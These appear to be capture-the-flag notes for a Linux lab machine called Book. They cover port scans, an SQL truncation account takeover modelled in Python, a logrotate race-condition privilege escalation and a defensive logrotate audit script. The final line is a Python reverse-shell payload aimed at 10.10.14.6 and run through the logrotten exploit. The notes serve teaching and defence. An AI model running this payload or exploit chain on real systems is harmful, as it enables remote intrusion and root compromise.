Machine - Book - Linux - Medium

```text
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
|   256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
|_  256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LIBRARY - Read | Learn | Have Fun
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-enum:
|   /admin/: Possible admin folder
|_  /admin/index.php: Possible admin folder
|_http-server-header: Apache/2.4.29 (Ubuntu)
```

## fuzzing

  • Could create a user for the normal portal
  • there is an /admin portal that doesn't allow creating users
  • on the page, as a normal user, I can upload things…
  • we have another user admin@book.htb
  • there is a place to send email… maybe we can do some XSS
    • didn't work :(
  • SQL injection (nope)
  • SQL truncation
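The SQL truncation item above is the one that matters for the portal, and the plaintext admin password noted in the next section is the related storage weakness. The Python model below is an added example, not code from the page or from the Book machine. It assumes a MySQL-style VARCHAR(20) email column under a PAD SPACE collation (the width, the `Portal` class, the `store_email`/`same_key`/`demo` helpers and the passwords are constructed for this illustration): without `STRICT_TRANS_TABLES` an over-length value is silently cut to the column width, and trailing spaces are ignored when two values are compared, so a crafted registration can leave a second row that matches the admin address at login. The hardened path rejects over-length input in the application, relies on strict SQL mode as a second layer, and stores a salted PBKDF2 hash instead of the plaintext password.

```python
import hashlib
import hmac
import os

# Constructed model of a MySQL-style VARCHAR column (width chosen for the demo).
EMAIL_MAX_LEN = 20


class TruncationError(ValueError):
    """Stands in for the 'Data too long for column' error of strict SQL mode."""


def store_email(value, strict):
    """What the database keeps for `value` in a VARCHAR(EMAIL_MAX_LEN) column.

    strict=False mimics sql_mode without STRICT_TRANS_TABLES: the value is
    silently truncated and the INSERT succeeds.  strict=True mimics
    STRICT_TRANS_TABLES: the over-length INSERT is rejected.
    """
    if len(value) <= EMAIL_MAX_LEN:
        return value
    if strict:
        raise TruncationError("Data too long for column 'email'")
    return value[:EMAIL_MAX_LEN]


def same_key(a, b):
    """PAD SPACE collations ignore trailing spaces, so 'x' and 'x   ' compare equal."""
    return a.rstrip(" ") == b.rstrip(" ")


def kdf(password, salt):
    """Salted password hash; a per-user random salt is the fix for plaintext storage."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class Portal:
    """Minimal registration/login flow.  strict_mode=False is the vulnerable shape."""

    def __init__(self, strict_mode):
        self.strict_mode = strict_mode
        self.users = []  # rows of (stored_email, salt, password_hash)

    def register(self, email, password):
        # Hardened path, layer 1: validate length in the application before any query.
        if self.strict_mode and len(email) > EMAIL_MAX_LEN:
            return "rejected"
        # The duplicate check runs on the value the user SUBMITTED ...
        if any(same_key(stored, email) for stored, _, _ in self.users):
            return "exists"
        # ... but the row is written with the value the database KEEPS.
        try:
            stored = store_email(email, self.strict_mode)
        except TruncationError:
            return "rejected"  # layer 2: strict SQL mode refuses the over-length row
        salt = os.urandom(16)
        self.users.append((stored, salt, kdf(password, salt)))
        return "created"

    def login(self, email, password):
        for stored, salt, pw_hash in self.users:
            if same_key(stored, email) and hmac.compare_digest(kdf(password, salt), pw_hash):
                return True
        return False


def demo(strict_mode):
    """Register the admin, then a crafted address, and report whether the second
    registrant's password now opens the admin's account.  Returns (outcome, logged_in)."""
    portal = Portal(strict_mode)
    portal.register("admin@book.htb", "constructed-admin-password")  # address from the page
    # 14 chars of admin address + 6 spaces reach the column width; the extra 'x'
    # gets past the application's duplicate check but is cut off by the database.
    crafted = "admin@book.htb" + " " * (EMAIL_MAX_LEN - len("admin@book.htb")) + "x"
    outcome = portal.register(crafted, "second-registrant-password")
    return outcome, portal.login("admin@book.htb", "second-registrant-password")


if __name__ == "__main__":
    print("non-strict:", demo(strict_mode=False))  # ('created', True)
    print("strict:   ", demo(strict_mode=True))    # ('rejected', False)
```

A UNIQUE index on the email column closes the same gap at the database layer, because the uniqueness check runs on the stored (truncated) value under the same collation and the second row collides with the admin's; the application-side length check is still worth keeping so the failure is reported as a validation error rather than a database one.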

## reader -> root

  • I could connect to the db and try to get the password of admin…
  • no SUID binaries that I could see
  • nothing from sudo -l
  • in the database the password is stored in plaintext, neither salted nor hashed: Sup3r_S3cur3_P455
  • maybe something is executed at regular intervals…
  • I see something about lxc in the SUID binaries and there is an exploit…
    • no way, I don't have the lxc group
  • I saw that there is a logrotate executed every now and then as root
    • and there is an exploit for that https://github.com/whotwagner/logrotten
    • it exploits a race condition, making it possible to write as the user root
    • we could try to copy the authorized_keys to /root/.ssh/authorized_keys
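The precondition the logrotate bullets above describe is a root-run logrotate recreating a log that lives in a directory a less privileged user controls, which the race turns into a write as root. The audit below is an added example, not code from the page or from logrotten: it parses logrotate config text and flags entries where `create` is used, no `su` or `copytruncate` directive applies, and the log's parent directory is owned by a non-root user or is group/other writable. The config text, the `FakeStat` ownership table and uid 1000 for reader are constructed for the demonstration; the log path is the one from the notes. On a real host call `rotation_risks()` with the default `os.stat` over the contents of /etc/logrotate.conf and /etc/logrotate.d.

```python
import os
import stat


def parse_logrotate(text):
    """Split logrotate config text into (paths, directives) blocks.

    Top-level directives outside any '{ ... }' block (e.g. a global 'weekly')
    are ignored; only per-log blocks are returned.
    """
    blocks, paths, directives = [], [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        if directives is not None:           # inside a block
            if line == "}":
                blocks.append((paths, directives))
                paths, directives = [], None
            else:
                directives.append(line)
        elif line.endswith("{"):             # 'path [path ...] {'
            paths += line[:-1].split()
            directives = []
        elif line.startswith("/"):           # paths may span lines before the '{'
            paths += line.split()
    return blocks


def rotation_risks(config_text, stat_fn=os.stat):
    """Return [(log_path, detail)] for logs that root-run logrotate would
    recreate inside a directory controlled by someone other than root."""
    findings = []
    for paths, directives in parse_logrotate(config_text):
        words = {d.split()[0] for d in directives}
        # 'create' = rename the old file, then create a fresh one (the step the race
        # abuses); 'copytruncate' avoids the rename; 'su user group' makes logrotate
        # rotate as that user, so a hijacked create cannot yield a root-owned file.
        if "create" not in words or "su" in words or "copytruncate" in words:
            continue
        for path in paths:
            parent = os.path.dirname(path)
            try:
                st = stat_fn(parent)
            except FileNotFoundError:
                continue
            non_root_owner = st.st_uid != 0
            group_other_writable = bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))
            if non_root_owner or group_other_writable:
                findings.append(
                    (path, f"{parent}: uid {st.st_uid}, mode {oct(stat.S_IMODE(st.st_mode))}")
                )
    return findings


# --- constructed sample input: a fake filesystem and two config variants ---
class FakeStat:
    def __init__(self, uid, mode):
        self.st_uid = uid
        self.st_mode = stat.S_IFDIR | mode


SAMPLE_FS = {
    "/home/reader/backups": FakeStat(1000, 0o755),  # user-owned directory (uid constructed)
    "/var/log/apache2": FakeStat(0, 0o755),         # root-owned, the normal case
}


def fake_stat(path):
    """Stand-in for os.stat over SAMPLE_FS so the audit runs offline."""
    if path not in SAMPLE_FS:
        raise FileNotFoundError(path)
    return SAMPLE_FS[path]


SAMPLE_CONFIG = """
/home/reader/backups/access.log {
    daily
    rotate 3
    create
}
/var/log/apache2/*.log {
    weekly
    create 640 root adm
}
"""

# Same entries, with the user-owned log rotated under that user's own identity.
SAMPLE_CONFIG_FIXED = """
/home/reader/backups/access.log {
    su reader reader
    daily
    rotate 3
    create
}
/var/log/apache2/*.log {
    weekly
    create 640 root adm
}
"""

if __name__ == "__main__":
    for path, detail in rotation_risks(SAMPLE_CONFIG, fake_stat):
        print("RISK", path, detail)
    print("fixed config findings:", rotation_risks(SAMPLE_CONFIG_FIXED, fake_stat))
```

Either `su reader reader` or `copytruncate` removes the finding; the former is the cleaner fix for a log that belongs to a user, since the rotation then runs with that user's privileges and nothing root-owned is ever created in the user's directory.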

```bash
echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.6\",4646));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" & ./logrotten -d -p ./payloadfile /home/reader/backups/access.log
```